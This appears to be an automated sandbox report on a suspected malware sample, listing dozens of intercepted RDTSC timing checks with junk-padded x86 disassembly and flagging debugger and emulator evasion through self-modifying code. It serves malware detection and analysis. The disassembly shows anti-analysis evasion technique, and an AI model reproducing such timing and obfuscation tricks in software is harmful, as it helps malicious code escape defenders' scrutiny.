                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5E58 second address: 5D5E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5F86 second address: 5D5F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5F8A second address: 5D5F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5F95 second address: 5D5F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5F9B second address: 5D5FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F55E4D05138h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5FBB second address: 5D5FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6147 second address: 5D6173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05137h 0x00000007 jmp 00007F55E4D05131h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6173 second address: 5D617B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D617B second address: 5D617F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6620 second address: 5D6624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6768 second address: 5D676F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D676F second address: 5D6775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6775 second address: 5D6784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jo 00007F55E4D05126h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6784 second address: 5D67A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F55E4D1D2E5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D67A3 second address: 5D67A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DB20A second address: 5DB213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DB213 second address: 5DB231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jbe 00007F55E4D0513Dh 0x0000000b jmp 00007F55E4D05131h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5225F0 second address: 5225F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5225F4 second address: 5225F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1BB7 second address: 5E1BD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E5h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1E40 second address: 5E1E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1E46 second address: 5E1E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1E4A second address: 5E1E6C instructions: 0x00000000 rdtsc 0x00000002 je 00007F55E4D05126h 0x00000008 jmp 00007F55E4D05138h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1E6C second address: 5E1EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F55E4D1D2E3h 0x00000008 jno 00007F55E4D1D2D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F55E4D1D2DCh 0x00000019 jmp 00007F55E4D1D2E7h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2048 second address: 5E2064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F55E4D05135h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2064 second address: 5E206A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E25EA second address: 5E25EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E33B7 second address: 5E33D2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F55E4D1D2D6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F55E4D1D2DBh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E33D2 second address: 5E33DE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9AF9 second address: 5E9B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F55E4D1D2DFh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9B11 second address: 5E9B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6347 second address: 5F634B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F634B second address: 5F634F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F634F second address: 5F6370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F55E4D1D2E8h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9BD6 second address: 5F9C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F55E4D05134h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e jmp 00007F55E4D05136h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F55E4D0512Ch 0x0000001c jng 00007F55E4D05126h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F95F9 second address: 5F9610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F55E4D1D2DDh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9610 second address: 5F9616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9616 second address: 5F961A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F97BC second address: 5F97CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D0512Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F97CF second address: 5F97DC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBC84 second address: 5FBC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBC88 second address: 5FBC93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBC93 second address: 5FBC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBC99 second address: 5FBCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBCA3 second address: 5FBCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBCA9 second address: 5FBCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBCB3 second address: 5FBCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB9EA second address: 5FB9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB9F2 second address: 5FB9F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB9F9 second address: 5FBA04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F55E4D1D2D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6025EF second address: 6025F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6025F5 second address: 6025F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6055D0 second address: 6055D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6055D4 second address: 6055EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E5h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B4EC second address: 60B515 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F55E4D0512Ch 0x00000008 jmp 00007F55E4D05134h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B515 second address: 60B526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jl 00007F55E4D1D2D6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B526 second address: 60B52C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6134E0 second address: 6134FE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jns 00007F55E4D1D2D6h 0x00000014 jo 00007F55E4D1D2D6h 0x0000001a pop edi 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6134FE second address: 613509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F55E4D05126h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61367D second address: 61369B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F55E4D1D2E9h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61369B second address: 6136C8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F55E4D0512Ch 0x00000008 jne 00007F55E4D05128h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F55E4D05126h 0x0000001b jmp 00007F55E4D0512Ch 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6136C8 second address: 6136CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F024 second address: 51F032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F55E4D0512Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613B09 second address: 613B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613D92 second address: 613D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613D96 second address: 613D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613D9A second address: 613DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F55E4D05126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61BC2F second address: 61BC43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F55E4D1D2DFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6285B3 second address: 6285BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F55E4D05126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6283FF second address: 62842C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2DAh 0x00000007 jnp 00007F55E4D1D2D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F55E4D1D2E7h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62842C second address: 628432 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629CA1 second address: 629CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jg 00007F55E4D1D2D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629CAF second address: 629CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629CBA second address: 629CD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007F55E4D1D2F4h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007F55E4D1D2D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629CD2 second address: 629CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F55E4D05126h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636F74 second address: 636F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F55E4D1D2DBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64768D second address: 647693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646C27 second address: 646C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6471B7 second address: 6471BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64A5F2 second address: 64A6AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F55E4D1D2E9h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 call 00007F55E4D1D2DFh 0x00000015 jmp 00007F55E4D1D2DAh 0x0000001a pop edx 0x0000001b push dword ptr [ebp+122D3428h] 0x00000021 movzx edx, ax 0x00000024 call 00007F55E4D1D2D9h 0x00000029 push ebx 0x0000002a pushad 0x0000002b jl 00007F55E4D1D2D6h 0x00000031 push ecx 0x00000032 pop ecx 0x00000033 popad 0x00000034 pop ebx 0x00000035 push eax 0x00000036 push edi 0x00000037 pushad 0x00000038 push eax 0x00000039 pop eax 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d pop edi 0x0000003e mov eax, dword ptr [esp+04h] 0x00000042 jne 00007F55E4D1D2DAh 0x00000048 mov eax, dword ptr [eax] 0x0000004a pushad 0x0000004b jno 00007F55E4D1D2D8h 0x00000051 js 00007F55E4D1D2E7h 0x00000057 jmp 00007F55E4D1D2E1h 0x0000005c popad 0x0000005d mov dword ptr [esp+04h], eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 pushad 0x00000065 popad 0x00000066 jmp 00007F55E4D1D2E8h 0x0000006b popad 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B825 second address: 64B829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B829 second address: 64B868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F55E4D1D2D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F55E4D1D2DCh 0x00000012 popad 0x00000013 pushad 0x00000014 jc 00007F55E4D1D2D8h 0x0000001a push edx 0x0000001b pop edx 0x0000001c jmp 00007F55E4D1D2E6h 0x00000021 pushad 0x00000022 push edx 0x00000023 pop edx 0x00000024 push edi 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D0C4 second address: 64D0CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D0CE second address: 64D11D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 jng 00007F55E4D1D31Eh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F55E4D1D2E7h 0x00000016 jp 00007F55E4D1D2D6h 0x0000001c popad 0x0000001d pushad 0x0000001e jnp 00007F55E4D1D2D6h 0x00000024 jmp 00007F55E4D1D2E7h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE049E second address: 4CE04A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE04A2 second address: 4CE04A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE04A6 second address: 4CE04AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE04AC second address: 4CE0512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F55E4D1D2E6h 0x0000000f push eax 0x00000010 jmp 00007F55E4D1D2DBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F55E4D1D2E6h 0x0000001b mov ebp, esp 0x0000001d jmp 00007F55E4D1D2E0h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov ebx, ecx 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE0568 second address: 4CE057D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05131h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE057D second address: 4CE05A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F55E4D1D2DEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE05A9 second address: 4CE05AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE05AD second address: 4CE05CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C407 second address: 56C41D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F55E4D05126h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jp 00007F55E4D05130h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C59B second address: 56C5A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C730 second address: 56C741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F55E4D0512Dh 0x00000009 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3BDD49 instructions caused by: Self-modifying code
